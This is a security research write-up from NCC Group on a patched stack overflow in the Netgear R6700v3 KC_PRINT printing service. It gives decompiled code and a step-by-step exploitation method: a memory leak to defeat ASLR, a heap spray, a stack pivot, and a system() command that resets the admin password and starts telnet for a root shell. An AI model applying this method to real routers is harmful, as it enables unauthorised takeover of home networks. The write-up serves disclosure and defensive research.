Summary
This blog post describes a stack-based overflow vulnerability found and exploited in September 2021 by Alex Plaskett, Cedric Halbronn and Aaron Adams working at the Exploit Development Group (EDG) of NCC Group. The vulnerability was patched within the firmware update contained within the following Netgear advisory.
The vulnerability is in the KC_PRINT
service (/usr/bin/KC_PRINT
), running by default on the Netgear R6700v3 router. Although it is a default service, the vulnerability is only reachable if the ReadySHARE feature is turned on, which means a printer is physically connected to the Netgear router through an USB port. No configuration is needed to be made, so the default configuration is exploitable as soon as a printer is connected to the router.
This vulnerability can be exploited on the LAN side of the router and does not need authentication. It allows an attacker to get remote code execution as the admin
user (highest privileges) on the router.
Our exploitation method is very similar to what was used in the Tokyo Drift paper i.e. we chose to change the admin
password and start utelnetd
service, which allowed us to then get a privileged shell on the router.
We have analysed and exploited the vulnerability on the V1.0.4.118_10.0.90 version, which we detail below, but older versions are likely vulnerable too.
Note: The Netgear R6700v3 router is based on the ARM (32-bit) architecture.
We have named our exploit "BrokenPrint". This is because "KC" is pronounced like "cassé" in French which means "broken" in English.
Vulnerability details
Background on ReadySHARE
This video explains well what ReadySHARE is, but it basically allows to access a USB printer through the Netgear router as if the printer were a network printer.
Reaching the vulnerable memcpy()
The KC_PRINT
binary does not have symbols but has a lot of logging/error functions
which contain some function names. The code shown below is decompiled code from IDA/Hex-Rays
as no open source has been found for this binary.
The KC_PRINT
binary creates lots of threads to handle different features:
The first thread handler we are interested in is ipp_server()
at address 0xA174
.
We see it listens on port 631, and when it accepts a client connection, it creates a new thread handled by thread_handle_client_connection()
at address 0xA4B4
and passes the client socket to this new thread.
void __noreturn ipp_server() { // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND] addr_len = 0x10; optval = 1; kc_client = 0; pthread_attr_init( attr); pthread_attr_setdetachstate( attr, 1); sock = socket(AF_INET, SOCK_STREAM, 0); if ( sock < 0 ) { ... } if ( setsockopt(sock, 1, SO_REUSEADDR, optval, 4u) < 0 ) { ... } memset( sin, 0, sizeof(sin)); sin.sin_family = 2; sin.sin_addr.s_addr = htonl(0); sin.sin_port = htons(631u); // listens on TCP 631 if ( bind(sock, (const struct sockaddr *) sin, 0x10u) < 0 ) { ... } // accept up to 128 clients simultaneously listen(sock, 128); while ( g_enabled ) { client_sock = accept(sock, addr, addr_len); if ( client_sock >= 0 ) { update_count_client_connected(CLIENT_CONNECTED); val[0] = 60; val[1] = 0; if ( setsockopt(client_sock, 1, SO_RCVTIMEO, val, 8u) < 0 ) perror("ipp_server: setsockopt SO_RCVTIMEO failed"); kc_client = (kc_client *)malloc(sizeof(kc_client)); if ( kc_client ) { memset(kc_client, 0, sizeof(kc_client)); kc_client->client_sock = client_sock; pthread_mutex_lock( g_mutex); thread_index = get_available_client_thread_index(); if ( thread_index < 0 ) { pthread_mutex_unlock( g_mutex); free(kc_client); kc_client = 0; close(client_sock); update_count_client_connected(CLIENT_DISCONNECTED); } else if ( pthread_create( g_client_threads[thread_index], attr, (void *(*)(void *))thread_handle_client_connection, kc_client) ) { ... } else { pthread_mutex_unlock( g_mutex); } } else { ... } } } close(sock); pthread_attr_destroy( attr); pthread_exit(0); }
The client handler calls into do_http
at address 0xA530
:
void __fastcall __noreturn thread_handle_client_connection(kc_client *kc_client) { // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND] client_sock = kc_client->client_sock; while ( g_enabled !do_http(kc_client) ) ; close(client_sock); update_count_client_connected(CLIENT_DISCONNECTED); free(kc_client); pthread_exit(0); }
The do_http()
function reads a HTTP-like request until it finds the end of the HTTP
headers rnrn
into a 1024-byte stack buffer. It then searches for a POST /USB
URI and an _LQ
string where usblp_index
is an integer. It then calls
into is_printer_connected()
at 0x16150
.
The is_printer_connected()
won’t be shown for brevity but all it does is open the
/proc/printer_status
file, tries to read its content and tries to find an USB port
by looking for a string like usblp%d
. This will only be found if a printer is
connected to the Netgear router, meaning it will never continue further if no printer
is connected.
unsigned int __fastcall do_http(kc_client *kc_client) { // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND] kc_client_ = kc_client; client_sock = kc_client->client_sock; content_len = 0xFFFFFFFF; strcpy(http_continue, "HTTP/1.1 100 Continuernrn"); pCurrent = 0; pUnderscoreLQ_or_CRCL = 0; p_client_data = 0; kc_job = 0; strcpy(aborted_by_system, "aborted-by-system"); remaining_len = 0; kc_chunk = 0; // buf_read is on the stack and is 1024 bytes memset(buf_read, 0, sizeof(buf_read)); // Read in 1024 bytes maximum count_read = readUntil_0d0a_x2(client_sock, (unsigned __int8 *)buf_read, 0x400); if ( (int)count_read <= 0 ) return 0xFFFFFFFF; // if received "100-continue", sends back "HTTP/1.1 100 Continuernrn" if ( strstr(buf_read, "100-continue") ) { ret_1 = send(client_sock, http_continue, 0x19u, 0); if ( ret_1 <= 0 ) { perror("do_http() write 100 Continue xx"); return 0xFFFFFFFF; } } // If POST /USB is found pCurrent = strstr(buf_read, "POST /USB"); if ( !pCurrent ) return 0xFFFFFFFF; pCurrent += 9; // points after "POST /USB" // If _LQ is found pUnderscoreLQ_or_CRCL = strstr(pCurrent, "_LQ"); if ( !pUnderscoreLQ_or_CRCL ) return 0xFFFFFFFF; Underscore = *pUnderscoreLQ_or_CRCL; *pUnderscoreLQ_or_CRCL = 0; usblp_index = atoi(pCurrent); *pUnderscoreLQ_or_CRCL = Underscore; if ( usblp_index > 10 ) return 0xFFFFFFFF; // by default, will exit here as no printer connected if ( !is_printer_connected(usblp_index) ) return 0xFFFFFFFF; // exit if no printer connected kc_client_->usblp_index = usblp_index;
It then parses the HTTP Content-Length
header and starts by reading 8 bytes from the HTTP content.
Depending on values of these 8 bytes, it calls into do_airippWithContentLength()
at 0x128C0
which is the one we are interested in.
// /! does not read from pCurrent pCurrent = strstr(buf_read, "Content-Length: "); if ( !pCurrent ) { // Handle chunked HTTP encoding ... } // no chunk encoding here, normal http request pCurrent += 0x10; pUnderscoreLQ_or_CRCL = strstr(pCurrent, "rn"); if ( !pUnderscoreLQ_or_CRCL ) return 0xFFFFFFFF; Underscore = *pUnderscoreLQ_or_CRCL; *pUnderscoreLQ_or_CRCL = 0; content_len = atoi(pCurrent); *pUnderscoreLQ_or_CRCL = Underscore; memset(recv_buf, 0, sizeof(recv_buf)); count_read = recv(client_sock, recv_buf, 8u, 0);// 8 bytes are read only initially if ( count_read != 8 ) return 0xFFFFFFFF; if ( (recv_buf[2] || recv_buf[3] != 2) (recv_buf[2] || recv_buf[3] != 6) ) { ret_1 = do_airippWithContentLength(kc_client_, content_len, recv_buf); if ( ret_1 < 0 ) return 0xFFFFFFFF; return 0; } ...
The do_airippWithContentLength()
function allocates a heap buffer to hold the entire HTTP content,
copy the previously 8 bytes already read and reads the remaining bytes into that new heap buffer.
Note: there is no limit on the actual HTTP content size as long as malloc()
does not fail due to insufficient
memory, which will be useful later to spray memory.
Then, still depending on the values of the 8 bytes initially read, it calls into additional functions. We
are interested in the Response_Get_Jobs()
at 0x102C4
which contains the stack-based overflow we are going to exploit.
Note that other Response_XXX()
functions contain similar stack overflows but it seems Response_Get_Jobs()
was the most straight forward to exploit, so we targeted this function.
unsigned int __fastcall do_airippWithContentLength(kc_client *kc_client, int content_len, char *recv_buf_initial) { // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND] client_sock = kc_client->client_sock; recv_buf2 = malloc(content_len); if ( !recv_buf2 ) return 0xFFFFFFFF; memcpy(recv_buf2, recv_buf_initial, 8u); if ( toRead(client_sock, recv_buf2 + 8, content_len - 8) >= 0 ) { if ( recv_buf2[2] || recv_buf2[3] != 0xB ) { if ( recv_buf2[2] || recv_buf2[3] != 4 ) { if ( recv_buf2[2] || recv_buf2[3] != 8 ) { if ( recv_buf2[2] || recv_buf2[3] != 9 ) { if ( recv_buf2[2] || recv_buf2[3] != 0xA ) { if ( recv_buf2[2] || recv_buf2[3] != 5 ) Job = Response_Unk_1(kc_client, recv_buf2); else // recv_buf2[3] == 0x5 Job = Response_Create_Job(kc_client, recv_buf2, content_len); } else { // recv_buf2[3] == 0xA Job = Response_Get_Jobs(kc_client, recv_buf2, content_len); } } else { ... }
The first part of the vulnerable Response_Get_Jobs()
function code is shown below:
// recv_buf was allocated on the heap unsigned int __fastcall Response_Get_Jobs(kc_client *kc_client, unsigned __int8 *recv_buf, int content_len) { char command[64]; // [sp+24h] [bp-1090h] BYREF char suffix_data[2048]; // [sp+64h] [bp-1050h] BYREF char job_data[2048]; // [sp+864h] [bp-850h] BYREF unsigned int error; // [sp+1064h] [bp-50h] size_t copy_len; // [sp+1068h] [bp-4Ch] int copy_len_1; // [sp+106Ch] [bp-48h] size_t copied_len; // [sp+1070h] [bp-44h] size_t prefix_size; // [sp+1074h] [bp-40h] int in_offset; // [sp+1078h] [bp-3Ch] char *prefix_ptr; // [sp+107Ch] [bp-38h] int usblp_index; // [sp+1080h] [bp-34h] int client_sock; // [sp+1084h] [bp-30h] kc_client *kc_client_1; // [sp+1088h] [bp-2Ch] int offset_job; // [sp+108Ch] [bp-28h] char bReadAllJobs; // [sp+1093h] [bp-21h] char is_job_media_sheets_completed; // [sp+1094h] [bp-20h] char is_job_state_reasons; // [sp+1095h] [bp-1Fh] char is_job_state; // [sp+1096h] [bp-1Eh] char is_job_originating_user_name; // [sp+1097h] [bp-1Dh] char is_job_name; // [sp+1098h] [bp-1Ch] char is_job_id; // [sp+1099h] [bp-1Bh] char suffix_copy1_done; // [sp+109Ah] [bp-1Ah] char flag2; // [sp+109Bh] [bp-19h] size_t final_size; // [sp+109Ch] [bp-18h] int offset; // [sp+10A0h] [bp-14h] size_t response_len; // [sp+10A4h] [bp-10h] char *final_ptr; // [sp+10A8h] [bp-Ch] size_t suffix_offset; // [sp+10ACh] [bp-8h] kc_client_1 = kc_client; client_sock = kc_client->client_sock; usblp_index = kc_client->usblp_index; suffix_offset = 0; // offset in the suffix_data[] stack buffer in_offset = 0; final_ptr = 0; response_len = 0; offset = 0; // offset in the client data "recv_buf" array final_size = 0; flag2 = 0; suffix_copy1_done = 0; is_job_id = 0; is_job_name = 0; is_job_originating_user_name = 0; is_job_state = 0; is_job_state_reasons = 0; is_job_media_sheets_completed = 0; bReadAllJobs = 0; // prefix_data is a heap allocated buffer to copy some bytes // from the client input but is not super useful from an // exploitation point of view prefix_size = 74; // size of prefix_ptr[] heap buffer prefix_ptr = (char *)malloc(74u); if ( !prefix_ptr ) { perror("Response_Get_Jobs: malloc xx"); return 0xFFFFFFFF; } memset(prefix_ptr, 0, prefix_size); // copy bytes indexes 0 and 1 from client data copied_len = memcpy_at_index(prefix_ptr, in_offset, recv_buf[offset], 2u); in_offset += copied_len; // we make sure to avoid this condition to be validated // so we keep bReadAllJobs == 0 if ( *recv_buf == 1 !recv_buf[1] ) bReadAllJobs = 1; offset += 2; // set prefix_data's bytes index 2 and 3 to 0x00 prefix_ptr[in_offset++] = 0; prefix_ptr[in_offset++] = 0; offset += 2; // copy bytes indexes 4,5,6,7 from client data in_offset += memcpy_at_index(prefix_ptr, in_offset, recv_buf[offset], 4u); offset += 4; copy_len_1 = 0x42; // copy bytes indexes [8,74] from table keywords copied_len = memcpy_at_index(prefix_ptr, in_offset, table_keywords, 0x42u); in_offset += copied_len; ++offset; // offset = 9 after this // job_data[] and suffix_data[] are 2 stack buffers to copy some bytes // from the client input but are not super useful from an // exploitation point of view memset(job_data, 0, sizeof(job_data)); memset(suffix_data, 0, sizeof(suffix_data)); suffix_data[suffix_offset++] = 5; // we need to enter this to trigger the stack overflow if ( !bReadAllJobs ) { // iteration 1: offset == 9 // NOTE: we make sure to overwrite the "offset" local variable // to be content_len+1 when overflowing the stack buffer to exit this loop after the 1st iteration while ( recv_buf[offset] != 3 offset <= content_len ) { // we make sure to enter this as we need flag2 != 0 later // to trigger the stack overflow if ( recv_buf[offset] == 0x44 !flag2 ) { flag2 = 1; suffix_data[suffix_offset++] = 0x44; // we can set a copy_len == 0 to simplify this // offset = 9 here copy_len = (recv_buf[offset + 1] << 8) + recv_buf[offset + 2]; copied_len = memcpy_at_index(suffix_data, suffix_offset, recv_buf[offset + 1], copy_len + 2); suffix_offset += copied_len; } ++offset; // iteration 1: offset = 10 after this // this is the same copy_len as above but just used to skip bytes here // offset = 10 here copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1]; offset += 2 + copy_len; // we can set a copy_len == 0 to simplify this // iteration 1: offset = 12 after this // again, copy_len is pulled from client controlled data, // this time used in a copy onto a stack buffer // copy_len equals maximum: 0xff00 + 0xff // and a copy is made into command[] which is a 2048-byte buffer copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1]; offset += 2; // iteration 1: offset = 14 after this // we need flag2 == 1 to enter this if ( flag2 ) { // /! VULNERABILITY HERE /! memset(command, 0, sizeof(command)); memcpy(command, recv_buf[offset], copy_len);// VULN: stack overflow here ...
It first starts by allocating a prefix_ptr
heap buffer to hold a few bytes from the client data.
Depending on client data bytes 0 and 1, it may set bReadAllJobs = 1
which we want to avoid in order
to reach the vulnerable memcpy()
, so we make sure bReadAllJobs = 0
remains.
Above we see 2 memset()
for 2 stack buffers that we named job_data
and suffix_data
.
We then enter the if ( !bReadAllJobs )
. We craft client data to we make sure to validate the
while ( recv_buf[offset] != 3 offset <= content_len )
condition to enter the loop.
We also need to set flag2 = 1
so we make sure to validate the conditions on the client data to enter
the if ( recv_buf[offset] == 0x44 !flag2 )
condition.
Later inside the while loop if flag2
is set, then a 16-bit size (maximum is
0xffff = 65535
bytes) is read from the client data in copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1];
. Then, this size is used as
the argument to memcpy
when copying into a 64-byte stack buffer in
memcpy(command, recv_buf[offset], copy_len)
. This is a stack-based overflow
vulnerability where we control the overflowing size and content. There is no
limitation on the values of the bytes to use for overflowing, which makes it a
very nice vulnerability to exploit at first sight.
Since there is no stack cookie, the strategy to exploit this stack overflow is to overwrite the saved
return address on the stack and continue execution until the end of the function to get $pc
control.
Reaching the end of the function
It is now important to look at the stack layout from the command[]
array we are overflowing from.
As can be seen below, command[]
is the local variable that is furthest away from the return address.
This has the advantage of allowing us to control any of the local variable’s values post-overflow.
Remember that we are in the while
loop at the moment so the initial idea would be to get out of this loop
as soon as possible. By overwriting local variables and setting them to appropriate values,
this should be easy.
-00001090 command DCB 64 dup(?)
-00001050 suffix_data DCB 2048 dup(?)
-00000850 job_data DCB 2048 dup(?)
-00000050 error DCD ?
-0000004C copy_len DCD ?
-00000048 copy_len_1 DCD ?
-00000044 copied_len DCD ?
-00000040 prefix_size DCD ?
-0000003C in_offset DCD ?
-00000038 prefix_ptr DCD ? ; offset
-00000034 usblp_index DCD ?
-00000030 client_sock DCD ?
-0000002C kc_client_1 DCD ?
-00000028 offset_job DCD ?
-00000024 DCB ? ; undefined
-00000023 DCB ? ; undefined
-00000022 DCB ? ; undefined
-00000021 bReadAllJobs DCB ?
-00000020 is_job_media_sheets_completed DCB ?
-0000001F is_job_state_reasons DCB ?
-0000001E is_job_state DCB ?
-0000001D is_job_originating_user_name DCB ?
-0000001C is_job_name DCB ?
-0000001B is_job_id DCB ?
-0000001A suffix_copy1_done DCB ?
-00000019 flag2 DCB ?
-00000018 final_size DCD ?
-00000014 offset DCD ?
-00000010 response_len DCD ?
-0000000C final_ptr DCD ? ; offset
-00000008 suffix_offset DCD ?
So after our overflowing memcpy()
, we decide to set client data to hold the "job-id"
command to simplify code paths being taken. Then we see the offset += copy_len
statement.
Since we control both copy_len
and offset
values due to our overflow, we can craft values
to make us exit from the loop condition: while ( recv_buf[offset] != 3 offset <= content_len )
by setting offset = content_len+1
for instance.
Next we are executing the 2nd read_job_value()
call due to bReadAllJobs == 0
.
The read_job_value()
is not relevant for us but its purpose is to loop on all the printer’s jobs
and save the requested data (in our case it would be the job-id
). In our case, we assume there
is no printer’s job at the moment so nothing will be read. This means the offset_job
being returned is 0
.
// we need to enter this to trigger the stack overflow if ( !bReadAllJobs ) { // iteration 1: offset == 9 // NOTE: we make sure to overwrite the "offset" local variable // to be content_len+1 when overflowing the stack buffer to exit this loop after the 1st iteration while ( recv_buf[offset] != 3 offset <= content_len ) { ... // we need flag2 == 1 to enter this if ( flag2 ) { // /! VULNERABILITY HERE /! memset(command, 0, sizeof(command)); memcpy(command, recv_buf[offset], copy_len);// VULN: stack overflow here // dispatch to right command if ( !strcmp(command, "job-media-sheets-completed") ) { is_job_media_sheets_completed = 1; } ... else if ( !strcmp(command, "job-id") ) { // atm we make sure to send a "job-id " command to go here is_job_id = 1; } else { ... } } offset += copy_len; // this is executed before looping } } // end of while loop final_size += prefix_size; if ( bReadAllJobs ) offset_job = read_job_value(usblp_index, 1, 1, 1, 1, 1, 1, job_data); else offset_job = read_job_value( usblp_index, is_job_id, is_job_name, is_job_originating_user_name, is_job_state, is_job_state_reasons, is_job_media_sheets_completed, job_data);
Now, we continue to look at the vulnerable function code below. Since offset_job = 0
, the first if
clause is skipped
(Note: skipped for now as there is a label that we will jump to later, hence why we kept it in the code below).
Then, a heap buffer to hold a response is allocated and saved in final_ptr
. Then, data is copied from the prefix_ptr
buffer mentioned at the beginning of the vulnerable function. Finally, it jumps to the b_write_ipp_response2
label
where write_ipp_response()
at 0x13210
is called. write_ipp_response()
won’t be shown for brevity but its
purpose is to send an HTTP response to the client socket.
Finally, the 2 heap buffers pointed by prefix_ptr
and final_ptr
are freed and the function exits.
// offset_job is an offset inside job_data[] stack buffer // atm we assume offset_job == 0 so we skip this condition. // Note we assume that due to no printing job currently existing // but it would be better to actually make sure all the is_xxx variables == 0 as explained above if ( offset_job > 0 ) // assumed skipped for now { ... b_write_ipp_response2: final_ptr[response_len++] = 3; // the "client_sock" is a local variable that we overwrite // when trying to reach the stack address. We need to brute // force the socket value in order to effectively send // us our leaked data if we really want that data back but // otherwise the send() will silently fail error = write_ipp_response(client_sock, final_ptr, response_len); // From testing, it is safe to use the starting .got address for the prefix_ptr // and free() will ignore that address hehe // XXX - not sure why but if I use memset_ptr (offset inside // the .got), it crashes on free() though lol if ( prefix_ptr ) { free(prefix_ptr); prefix_ptr = 0; } // Freeing the final_ptr is no problem for us if ( final_ptr ) { free(final_ptr); final_ptr = 0; } // this is where we get $pc control if ( error ) return 0xFFFFFFFF; else return 0; } // we reach here if no job data final_ptr = (char *)malloc(++final_size); if ( final_ptr ) { // prefix_ptr is a heap buffer that was allocated at the // beginning of this function but pointer is stored in a // stack variable. We actually need to corrupt this pointer // as part of the stack overflow to reach the return address // which means we can leak make it copy any size from any // address which results in our leak primitive memset(final_ptr, 0, final_size); copied_len = memcpy_at_index(final_ptr, response_len, prefix_ptr, prefix_size); response_len += copied_len; goto b_write_ipp_response2; } // error below / never reached ... }
Exploitation
Mitigations in place
Our goal is to overwrite the return address to get $pc
control but there are a few challenges here.
We need to know what static addresses we can use.
Checking the ASLR settings of the kernel:
# cat /proc/sys/kernel/randomize_va_space
1
From here:
- 0 – Disable ASLR. This setting is applied if the kernel is booted with the norandmaps boot parameter.
- 1 – Randomize the positions of the stack, virtual dynamic shared object (VDSO) page, and shared memory regions. The base address of the data segment is located immediately after the end of the executable code segment.
- 2 – Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment. This is the default setting.
Checking the mitigations of the KC_PRINT
binary using checksec.py:
[*] '/home/cedric/test/firmware/netgear_r6700/_R6700v3-
V1.0.4.118_10.0.90.zip.extracted/
_R6700v3-V1.0.4.118_10.0.90.chk.extracted/squashfs-root/usr/bin/KC_PRINT'
Arch: arm-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8000)
So to summarize:
KC_PRINT
: not randomized.text
: read/execute.data
: read/write
- Libraries: randomized
- Heap: not randomized
- Stack: randomized
Building a leak primitive
If we go back to the previous decompiled code we discussed, there are a few things to point out:
final_ptr = (char *)malloc(++final_size); copied_len = memcpy_at_index(final_ptr, response_len, prefix_ptr, prefix_size); error = write_ipp_response(client_sock, final_ptr, response_len);
The first one is that in order to overwrite the return address we first need to overwrite
prefix_ptr
, prefix_size
and client_sock
.
prefix_ptr
needs to be a valid address and this address will be used to copy prefix_size
bytes from it into final_ptr
. Then that data will be sent back to the client socket
assuming client_sock
is a valid socket.
This looks like a good leak primitive since we control both prefix_ptr
and prefix_size
,
however we still need to know our previously valid client_sock
to get the data back.
However, what if we overwrite the whole stack frame containing all the local variables
except we don’t overwrite the saved registers and the return address? Well it will proceed
to send us data back and will exit the function as if no overflow happened. This is perfect
as it allows us to brute force the client_sock
value.
Moreover, by testing multiple times, we noticed that if we are the only client connecting to KC_PRINT
the client_sock
could be different among KC_PRINT
executions. However, once KC_PRINT
is started, it will keep allocating the same client_sock
for every connection as long
as we closed the previous connection.
This is a perfect scenario for us since it means we can initially bruteforce the socket value
by overflowing the entire stack frame (except the saved register and return value) until we
get an HTTP response, and KC_PRINT
will never crashes. Once we know that socket value, we
can start leaking data. But where to point prefix_ptr
to?
Bypassing ASLR and achieving command execution
Here, there is another challenge to solve. Indeed, at the end of Response_Get_Jobs
there is a
call to free(prefix_ptr);
before we can control $pc
. So initially we thought we would need
to know a valid heap address that is valid for free()
.
However after testing in the debugger, we noticed that passing the Global Offset Table (GOT)
address to the free()
call went through without crashing. We are not sure why as we didn’t investigate
for time reasons. However, this opens new opportunities. Indeed, the .got
is at a static address
due to KC_PRINT
being compiled without PIE support. It means we can leak an imported function
like memset()
which is in libc.so
. Then we can deduce the libc.so
base address and effectively
bypass the ASLR in place for libraries. We can then deduce the system()
address.
Our end goal is to call system()
on an arbitrary string to execute a shell command.
But where to store our data? Initially we thought we could use the data on the stack but the stack
is randomized so we can’t hardcode an address in our data. We could use a complicated ROP chain to
build the command string to execute, but it seemed over-complicated to do in ARM (32-bit) due
to ARM 32-bit alignment of instructions which makes using non-aligned instructions impossible. We
also thought about changing the ARM mode to Thumb mode. But is there an even easier method?
What if we could allocate controlled data at a specific address? Then we remembered the excellent
blog from Project Zero
which mentioned mmap()
randomization was broken on 32-bit. And in our case, we know the heap is not
randomized, so what about big allocations? It turns out they are randomized but not so well.
Remember we mentioned earlier in this blog post that we can send an HTTP content as big as we want and
a heap buffer of that size will be allocated? Now we have a use for it. By sending an HTTP content of e.g.
0x1000000
(16MB), we noticed it gets allocated outside of the [heap]
region and above the libraries.
More specifically we noticed by testing that an address in the range 0x401xxxxx-0x403xxxxx
will always be used.
# cat /proc/317/maps
00008000-00018000 r-xp 00000000 1f:03 1429 /usr/bin/KC_PRINT // static
00018000-00019000 rw-p 00010000 1f:03 1429 /usr/bin/KC_PRINT // static
00019000-0001c000 rw-p 00000000 00:00 0 [heap] // static
4001e000-40023000 r-xp 00000000 1f:03 376 /lib/ld-uClibc.so.0 // ASLR
4002a000-4002b000 r--p 00004000 1f:03 376 /lib/ld-uClibc.so.0
4002b000-4002c000 rw-p 00005000 1f:03 376 /lib/ld-uClibc.so.0
4002f000-40030000 rw-p 00000000 00:00 0
40154000-4015f000 r-xp 00000000 1f:03 265 /lib/libpthread.so.0 // ASLR
4015f000-40166000 ---p 00000000 00:00 0
40166000-40167000 r--p 0000a000 1f:03 265 /lib/libpthread.so.0
40167000-4016c000 rw-p 0000b000 1f:03 265 /lib/libpthread.so.0
4016c000-4016e000 rw-p 00000000 00:00 0
4016e000-401d3000 r-xp 00000000 1f:03 352 /lib/libc.so.0 // ASLR
401d3000-401db000 ---p 00000000 00:00 0
401db000-401dc000 r--p 00065000 1f:03 352 /lib/libc.so.0
401dc000-401dd000 rw-p 00066000 1f:03 352 /lib/libc.so.0
401dd000-401e2000 rw-p 00000000 00:00 0 // Broken ASLR
bcdfd000-bce00000 rwxp 00000000 00:00 0
bcffd000-bd000000 rwxp 00000000 00:00 0
bd1fd000-bd200000 rwxp 00000000 00:00 0
bd3fd000-bd400000 rwxp 00000000 00:00 0
bd5fd000-bd600000 rwxp 00000000 00:00 0
bd7fd000-bd800000 rwxp 00000000 00:00 0
bd9fd000-bda00000 rwxp 00000000 00:00 0
bdbfd000-bdc00000 rwxp 00000000 00:00 0
bddfd000-bde00000 rwxp 00000000 00:00 0
bdffd000-be000000 rwxp 00000000 00:00 0
be1fd000-be200000 rwxp 00000000 00:00 0
be3fd000-be400000 rwxp 00000000 00:00 0
beacc000-beaed000 rw-p 00000000 00:00 0 [stack] // ASLR
If it gets allocated in the lowest address 0x40100008
, it will end at 0x41100008
. It means we can spray
pages of the same data and get deterministic content at a static address, e.g. 0x41000100
.
Finally, looking at the Response_Get_Jobs
function’s epilogue, we see POP {R11,PC}
which means
we can craft a fake R11
and use a gadget like the following to pivot our stack to a new stack
where we have data we control to start doing Return Oriented Programming (ROP):
.text:000118A0 LDR R3, [R11,#-0x28]
.text:000118A4
.text:000118A4 loc_118A4 ; Get_JobNode_Print_Job+7D8↑j
.text:000118A4 MOV R0, R3
.text:000118A8 SUB SP, R11, #4
.text:000118AC POP {R11,PC}
So we can make R11 points to our static region 0x41000100
and also store the command to execute at a
static address in that region. Then we use the above gadget to retrieve the address of that command
(also stored in that region) in order to set the first argument of system()
(in r0
) and then pivot
to a new stack to that region that will make it finally return to system("any command")
Obtaining a root shell
We decided to use the following command: "nvram set http_passwd=nccgroup sleep 4 utelnetd -d -i br0"
.
This is very similar to the method that what was used in the
Tokyo drift paper
except that in our case we have more control since we are executing all the commands we want so we can set
an arbitrary password as well as start the utelnetd
process instead of just being able to reset the HTTP password
to its default value.
Finally, we use the same trick as the Tokyo drift paper and login to the web interface to re-set the password to the same
password, so utelnetd
takes into account our new password and we get a remote shell on the Netgear router.